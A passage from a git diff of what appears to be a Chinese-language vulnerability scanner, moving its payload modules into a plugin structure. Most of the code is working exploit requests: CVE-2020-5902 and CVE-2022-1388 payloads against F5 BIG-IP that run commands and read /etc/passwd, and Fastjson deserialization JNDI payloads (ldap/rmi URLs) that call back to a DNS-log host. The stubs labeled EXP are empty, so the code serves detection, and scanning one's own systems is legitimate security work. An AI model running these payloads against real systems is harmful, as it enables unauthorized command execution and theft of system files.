+                    'Target': res3.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Info': {
+                        'Decode': 'ASCII decimal encode',
+                        'Decode-Url': 'https://www.qqxiuzi.cn/bianma/ascii.htm'
+                    },
+                    'Request': res3
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ElasticSearch/main.py b/payloads/ElasticSearch/main.py
deleted file mode 100644
index 6610c25..0000000
--- a/payloads/ElasticSearch/main.py
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    ElasticSearch扫描类: 
-        1. ElasticSearch 命令执行
-            CVE-2014-3120
-                Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/
-
-        2. ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞
-            CVE-2015-1427
-                Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/
-
-        3. ElasticSearch 目录穿越
-            CVE-2015-3337
-                Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
-
-        4. ElasticSearch 目录穿越
-            CVE-2015-5531
-                Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-        #  Elasticsearch写入webshell
-        #   WooYun-2015-110216
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ElasticSearch.cve_2014_3120 import cve_2014_3120_scan
-from payloads.ElasticSearch.cve_2015_1427 import cve_2015_1427_scan
-from payloads.ElasticSearch.cve_2015_3337 import cve_2015_3337_scan
-from payloads.ElasticSearch.cve_2015_5531 import cve_2015_5531_scan
-
-class ElasticSearch():
-    def __init__(self):
-        self.app_name = 'ElasticSearch'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2014_3120_scan, clients=clients),
-            thread(target=cve_2015_1427_scan, clients=clients),
-            thread(target=cve_2015_3337_scan, clients=clients),
-            thread(target=cve_2015_5531_scan, clients=clients)
-        ]
-
-elasticsearch = ElasticSearch()
diff --git a/payloads/F5BIGIP/cve_2020_5902.py b/payloads/F5BIGIP/cve_2020_5902.py
deleted file mode 100644
index b0bc1cf..0000000
--- a/payloads/F5BIGIP/cve_2020_5902.py
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2020_5902_payloads = [
-    {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'},
-    {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx'},
-    {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'},
-    {'path': 'login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'},
-    {'path': 'login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx'},
-    {'path': 'login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'},
-    # {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=C:\Windows\System32\drivers\etc\hosts'},
-    # {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=C:/Windows/System32/drivers/etc/hosts'}
-]
-
-def cve_2020_5902_scan(clients):
-    ''' F5-BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞;
-        未授权的远程攻击者通过向该页面发送特制的请求包, 可以造成任意Java 代码执行;
-        进而控制 F5 BIG-IP 的全部功能, 包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'F5-BIG-IP',
-        'vul_type': 'RCE/FileRead',
-        'vul_id': 'CVE-2020-5902',
-    }
-
-    for payload in cve_2020_5902_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('encrypted-password' in res.text) 
-            or ('partition-access' in res.text) 
-            or (('"output": "' in res.text) and ('"error": "",' in res.text)) 
-            or check.check_res_fileread(res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/F5BIGIP/cve_2022_1388.py b/payloads/F5BIGIP/cve_2022_1388.py
deleted file mode 100644
index 2687da9..0000000
--- a/payloads/F5BIGIP/cve_2022_1388.py
+++ /dev/null
@@ -1,64 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2022_1388_payloads = [
-    {
-        'path': 'mgmt/tm/util/bash',
-        'data': '{"command": "run", "utilCmdArgs": "-c \'cat /etc/passwd\'"}'
-    },
-    {
-        'path': 'tm/util/bash',
-        'data': '{"command": "run", "utilCmdArgs": "-c \'cat /etc/passwd\'"}'
-    },
-    {
-        'path': 'util/bash',
-        'data': '{"command": "run", "utilCmdArgs": "-c \'cat /etc/passwd\'"}'
-    }
-]
-
-def cve_2022_1388_scan(clients):
-    ''' 未经身份验证的攻击者可以通过管理端口或自身IP地址
-            对BIG-IP系统进行网络访问, 执行任意系统命令、创建或删除文件或禁用服务
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'F5-BIG-IP',
-        # 'vul_type': 'unAuthorized',
-        'vul_type': 'unAuth/RCE',
-        'vul_id': 'CVE-2022-1388',
-    }
-
-    headers = {
-        'Connection': 'close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host',
-        'Content-type': 'application/json',
-        'Authorization': 'Basic YWRtaW46',
-        'X-F5-Auth-Token': 'mouse'
-    }
-
-    for payload in cve_2022_1388_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('commandResult' in res.text) 
-            and check.check_res_fileread(res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/F5BIGIP/f5bigip-cve-2020-5902-rce-fileread.py b/payloads/F5BIGIP/f5bigip-cve-2020-5902-rce-fileread.py
new file mode 100644
index 0000000..3374420
--- /dev/null
+++ b/payloads/F5BIGIP/f5bigip-cve-2020-5902-rce-fileread.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+F5-BIG-IP 远程代码执行
+    CVE-2020-5902
+        Payload: https://github.com/jas502n/CVE-2020-5902
+
+F5-BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞;
+    未授权的远程攻击者通过向该页面发送特制的请求包, 可以造成任意Java 代码执行;
+    进而控制 F5 BIG-IP 的全部功能, 包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'},
+            {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx'},
+            {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'},
+            {'path': 'login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'},
+            {'path': 'login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx'},
+            {'path': 'login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'},
+            # {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=C:\Windows\System32\drivers\etc\hosts'},
+            # {'path': 'tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=C:/Windows/System32/drivers/etc/hosts'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'F5-BIGIP',
+            'vul_type': 'RCE/FileRead',
+            'vul_id': 'CVE-2020-5902',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('encrypted-password' in res.text) 
+                or ('partition-access' in res.text) 
+                or (('"output": "' in res.text) and ('"error": "",' in res.text)) 
+                or check.check_res_fileread(res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/F5BIGIP/f5bigip-cve-2022-1388-unauth-rce.py b/payloads/F5BIGIP/f5bigip-cve-2022-1388-unauth-rce.py
new file mode 100644
index 0000000..615a557
--- /dev/null
+++ b/payloads/F5BIGIP/f5bigip-cve-2022-1388-unauth-rce.py
@@ -0,0 +1,79 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+F5-BIG-IP 身份认证绕过RCE
+    CVE-2022-1388
+        Payload: http://www.hackdig.com/05/hack-657629.htm
+
+未经身份验证的攻击者可以通过管理端口或自身IP地址
+    对BIG-IP系统进行网络访问, 执行任意系统命令、创建或删除文件或禁用服务
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'mgmt/tm/util/bash',
+                'data': '{"command": "run", "utilCmdArgs": "-c \'cat /etc/passwd\'"}'
+            },
+            {
+                'path': 'tm/util/bash',
+                'data': '{"command": "run", "utilCmdArgs": "-c \'cat /etc/passwd\'"}'
+            },
+            {
+                'path': 'util/bash',
+                'data': '{"command": "run", "utilCmdArgs": "-c \'cat /etc/passwd\'"}'
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'F5-BIGIP',
+            # 'vul_type': 'unAuthorized',
+            'vul_type': 'unAuth/RCE',
+            'vul_id': 'CVE-2022-1388',
+        }
+
+        headers = {
+            'Connection': 'close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host',
+            'Content-type': 'application/json',
+            'Authorization': 'Basic YWRtaW46',
+            'X-F5-Auth-Token': 'mouse'
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('commandResult' in res.text) 
+                and check.check_res_fileread(res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/F5BIGIP/main.py b/payloads/F5BIGIP/main.py
deleted file mode 100644
index 523e7b7..0000000
--- a/payloads/F5BIGIP/main.py
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    F5-BIG-IP扫描类: 
-        1. F5-BIG-IP 远程代码执行
-            CVE-2020-5902
-                Payload: https://github.com/jas502n/CVE-2020-5902
-
-        2. F5-BIG-IP 身份认证绕过RCE
-            CVE-2022-1388
-                Payload: http://www.hackdig.com/05/hack-657629.htm
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.F5BIGIP.cve_2020_5902 import cve_2020_5902_scan
-from payloads.F5BIGIP.cve_2022_1388 import cve_2022_1388_scan
-
-class F5_BIG_IP():
-    def __init__(self):
-        self.app_name = 'F5-BIG-IP'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_5902_scan, clients=clients),
-            thread(target=cve_2022_1388_scan, clients=clients)
-        ]
-
-f5bigip = F5_BIG_IP()
diff --git a/payloads/Fastjson/cnvd_2017_02833.py b/payloads/Fastjson/cnvd_2017_02833.py
deleted file mode 100644
index 9668861..0000000
--- a/payloads/Fastjson/cnvd_2017_02833.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cnvd_2017_02833_payloads = [
-    {'data': '''{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://DNSDOMAIN/35d9","autoCommit":true}}'''},
-    {'data': '''{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://DNSDOMAIN/3d9b","autoCommit":true}}'''},
-    {'data': '''{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://DNSDOMAIN/ff4518","autoCommit":true}}'''},
-]
-
-def cnvd_2017_02833_scan(clients):
-    ''' fastjson <= 1.2.24 反序列化漏洞'''
-    client = clients.get('reqClient')
-    sessid = '7d5ff4518944d45f35d9850f3d9be254'
-
-    vul_info = {
-        'app_name': 'Fastjson',
-        'vul_type': 'unSerialize',
-        'vul_id': 'CNVD-2017-02833',
-    }
-
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cnvd_2017_02833_payloads:                    # * Payload
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        data = payload['data'].replace('DNSDOMAIN', dns_domain) # * Data
-
-        res = client.request(
-            'post',
-            '',
-            data=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                                # * dns查询可能较慢, 等一会
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Fastjson/cnvd_2019_22238.py b/payloads/Fastjson/cnvd_2019_22238.py
deleted file mode 100644
index 37c7165..0000000
--- a/payloads/Fastjson/cnvd_2019_22238.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cnvd_2019_22238_payloads = [
-    {'data': '''{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://DNSDOMAIN/0333","autoCommit":true}}'''},
-    {'data': '''{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://DNSDOMAIN/c1d1","autoCommit":true}}'''},
-    {'data': '''{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://DNSDOMAIN/b152","autoCommit":true}}'''},
-]
-
-def cnvd_2019_22238_scan(clients):
-    ''' fastjson <= 1.2.47 反序列化漏洞 '''
-    client = clients.get('reqClient')
-    sessid = '7741b152f4f34cf03332b54c1d1f4320'
-
-    vul_info = {
-        'app_name': 'Fastjson',
-        'vul_type': 'unSerialize',
-        'vul_id': 'CNVD-2019-22238',
-    }
-
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cnvd_2019_22238_payloads:                    # * Payload
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        data = payload['data'].replace('DNSDOMAIN', dns_domain) # * Data
-
-        res = client.request(
-            'post',
-            '',
-            data=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                                # * dns查询可能较慢, 等一会
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Fastjson/fastjson-cnvd-2017-02833-rce.py b/payloads/Fastjson/fastjson-cnvd-2017-02833-rce.py
new file mode 100644
index 0000000..df9cec8
--- /dev/null
+++ b/payloads/Fastjson/fastjson-cnvd-2017-02833-rce.py
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Fastjson <= 1.2.24 反序列化
+    CNVD-2017-02833
+    CVE-2017-18349
+        Payload: https://vulhub.org/#/environments/fastjson/1.2.24-rce/
+
+fastjson <= 1.2.24 反序列化漏洞
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'data': '''{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://DNSDOMAIN/35d9","autoCommit":true}}'''},
+            {'data': '''{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://DNSDOMAIN/3d9b","autoCommit":true}}'''},
+            {'data': '''{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://DNSDOMAIN/ff4518","autoCommit":true}}'''},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '7d5ff4518944d45f35d9850f3d9be254'
+
+        vul_info = {
+            'app_name': 'Fastjson',
+            'vul_type': 'RCE',
+            'vul_id': 'CNVD-2017-02833',
+        }
+
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:               # * Payload
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            data = payload['data'].replace('DNSDOMAIN', dns_domain) # * Data
+
+            res = client.request(
+                'post',
+                '',
+                data=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Fastjson/fastjson-cnvd-2019-22238-rce.py b/payloads/Fastjson/fastjson-cnvd-2019-22238-rce.py
new file mode 100644
index 0000000..d55c520
--- /dev/null
+++ b/payloads/Fastjson/fastjson-cnvd-2019-22238-rce.py
@@ -0,0 +1,71 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Fastjson <=1.2.47 反序列化
+    CNVD-2019-22238
+        Payload: https://vulhub.org/#/environments/fastjson/1.2.47-rce/
+
+fastjson <= 1.2.47 反序列化漏洞
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'data': '''{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://DNSDOMAIN/0333","autoCommit":true}}'''},
+            {'data': '''{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://DNSDOMAIN/c1d1","autoCommit":true}}'''},
+            {'data': '''{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://DNSDOMAIN/b152","autoCommit":true}}'''},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '7741b152f4f34cf03332b54c1d1f4320'
+
+        vul_info = {
+            'app_name': 'Fastjson',
+            'vul_type': 'RCE',
+            'vul_id': 'CNVD-2019-22238',
+        }
+
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:               # * Payload
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            data = payload['data'].replace('DNSDOMAIN', dns_domain) # * Data
+
+            res = client.request(
+                'post',
+                '',
+                data=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
+
+def cnvd_2019_22238_scan(clients):
+    '''  '''
diff --git a/payloads/Fastjson/fastjson-v1.2.62-rce.py b/payloads/Fastjson/fastjson-v1.2.62-rce.py
new file mode 100644
index 0000000..72a3a9f
--- /dev/null
+++ b/payloads/Fastjson/fastjson-v1.2.62-rce.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Fastjson <= 1.2.62 反序列化
+    暂无编号
+        Payload: https://github.com/zhzyker/exphub/blob/master/fastjson/fastjson-1.2.62_rce.py
+                 https://cloud.tencent.com/developer/article/1593614
+
+2月19日，NVD发布的Jackson-databind JNDI注入漏洞（CVE-2020-8840）
+    在jackson-databind中的反序列化gadget也同样影响了fastjson
+    在开启了autoType功能的情况下（autoType功能默认关闭）
+    该漏洞影响最新的fastjson 1.2.62版本
+    攻击者利用该漏洞可实现在目标机器上的远程代码执行
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://DNSDOMAIN/aixn"}"'},
+            {'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://DNSDOMAIN/pozi"}"'},
+            {'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://DNSDOMAIN/lsai"}"'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '5f3b7891154790b67cfa29ba2041839e'
+        
+        vul_info = {
+            'app_name': 'Fastjson',
+            'vul_type': 'RCE',
+            'vul_id': 'fastjson-v1.2.62-rce',
+        }
+        
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                '',
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Fastjson/fastjson-v1.2.66-rce.py b/payloads/Fastjson/fastjson-v1.2.66-rce.py
new file mode 100644
index 0000000..d14a88e
--- /dev/null
+++ b/payloads/Fastjson/fastjson-v1.2.66-rce.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Fastjson <= 1.2.66 反序列化
+    暂无编号
+        Payload: https://cloud.tencent.com/developer/article/1906247
+
+
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'data': '{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://DNSDOMAIN/cmai"}'},
+            {'data': '{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://DNSDOMAIN/zosk"}'},
+            {'data': '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://DNSDOMAIN/pzoq"}'},
+            {'data': '{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://DNSDOMAIN/mzli"}}'},
+            {'data': '{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://DNSDOMAIN/qpak"}'},
+            {'data': '{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://DNSDOMAIN/sixu"}'},
+            {'data': '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://DNSDOMAIN/ajfi"}'},
+            {'data': '{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://DNSDOMAIN/zlfi"}}'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = 'ff79d39d7f4ed0b1569765c84fddb401'
+        
+        vul_info = {
+            'app_name': 'Fastjson',
+            'vul_type': 'RCE',
+            'vul_id': 'fastjson-v1.2.66-rce',
+        }
+        
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                '',
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Fastjson/main.py b/payloads/Fastjson/main.py
deleted file mode 100644
index 24d8074..0000000
--- a/payloads/Fastjson/main.py
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Fastjson扫描类: 
-        1. Fastjson <=1.2.47 反序列化
-            CNVD-2019-22238
-                Payload: https://vulhub.org/#/environments/fastjson/1.2.47-rce/
-            
-        2. Fastjson <= 1.2.24 反序列化
-            CNVD-2017-02833
-            CVE-2017-18349
-                Payload: https://vulhub.org/#/environments/fastjson/1.2.24-rce/
-
-        3. Fastjson <= 1.2.62 反序列化
-            暂无编号
-                Payload: https://github.com/zhzyker/exphub/blob/master/fastjson/fastjson-1.2.62_rce.py
-                         https://cloud.tencent.com/developer/article/1593614
-
-        4. Fastjson <= 1.2.66 反序列化
-            暂无编号
-                Payload: https://cloud.tencent.com/developer/article/1906247
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Fastjson.cnvd_2017_02833 import cnvd_2017_02833_scan
-from payloads.Fastjson.cnvd_2019_22238 import cnvd_2019_22238_scan
-from payloads.Fastjson.rce_1_2_62 import rce_1_2_62_scan
-from payloads.Fastjson.rce_1_2_66 import rce_1_2_66_scan
-
-class Fastjson():
-    def __init__(self):
-        self.app_name = 'Fastjson'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cnvd_2017_02833_scan, clients=clients),
-            thread(target=cnvd_2019_22238_scan, clients=clients),
-            thread(target=rce_1_2_62_scan, clients=clients),
-            thread(target=rce_1_2_66_scan, clients=clients),
-        ]
-
-fastjson = Fastjson()
\ No newline at end of file
diff --git a/payloads/Fastjson/rce_1_2_62.py b/payloads/Fastjson/rce_1_2_62.py
deleted file mode 100644
index 44348e7..0000000
--- a/payloads/Fastjson/rce_1_2_62.py
+++ /dev/null
@@ -1,59 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-rce_1_2_62_payloads = [
-    {'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://DNSDOMAIN/aixn"}"'},
-    {'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://DNSDOMAIN/pozi"}"'},
-    {'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://DNSDOMAIN/lsai"}"'},
-]
-
-def rce_1_2_62_scan(clients):
